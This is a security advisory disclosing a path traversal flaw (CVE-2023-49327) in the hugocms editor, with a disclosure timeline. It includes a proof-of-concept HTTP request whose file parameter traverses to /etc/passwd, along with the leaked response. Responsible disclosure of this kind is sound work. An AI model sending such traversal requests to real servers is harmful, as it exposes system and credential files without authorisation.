usd-2023-0034 | Arbitrary File Reads in hugocms

Advisory ID: usd-2023-0034
Product: hugocms
Affected Version: (latest as of 25.09.2023; commit 77443d6)
Vulnerability Type: CWE-35: Path Traversal
Security Risk: HIGH
Vendor URL: https://hugoeditor.com/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
Advisory Status: Published
CVE number: CVE-2023-49327
First Published: 2024-07-18
Last Update: 2024-07-18

Desciption

The application hugocms, developed by Inter-Data, provides a frontend for the static site generator hugo to manage posts and other aspects of the site. The application does not provide any access-control mechanism and recommends to restrict access via a web server's basic auth capabilities.

Users with access to hugocms can read arbitrary files of the host system by performing a path traversal. The flaw is present in hugocms/editor.load.php.

Proof of Concept

The following request reads the passwd file of the host:

Request:

POST /public/edit/hugocms/editor.load.php HTTP/1.1
Host: 10.1.1.157
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 28file=/../../../../etc/passwd

Response:

HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 18:40:34 GMT
Server: Apache/2.4.57 (Debian)
Vary: Accept-Encoding
Content-Length: 1136
Content-Type: text/html; charset=UTF-8

 

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin[...]

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin[...]

sshd:x:101:65534::/run/sshd:/usr/sbin/nologin[...]

Timeline

  • 2023-09-25: Vulnerability identified by Florian Dewald.
  • 2023-10-02: Sent first contact request.
  • 2023-10-16: Sent reminder email mentioning disclosure deadline.
  • 2023-10-25: Sent another reminder stressing that vulnerabilities will be publicly disclosed.
  • 2023-11-13: Sent another reminder stressing our deadline and that vulnerabilities will be publicly disclosed if we receive no answer.
  • 2023-11-22: Reached vendor via phone, sent vulnerability information.
  • 2023-12-04: Sent status update request to info@inter-data.de
  • 2023-12-06: Inter-Data reports that a fix is being worked on.
  • 2024-01-03: According to Inter-Data a fix is in the works and should be finished soon.
  • 2024-01-24: Reached out to Inter-Data for another status update.
  • 2024-01-26: Inter-Data reports that the vulnerability is fixed.
  • 2024-07-18: This advisory is published.

Credits

This security vulnerability was identified by Florian Dewald of usd AG.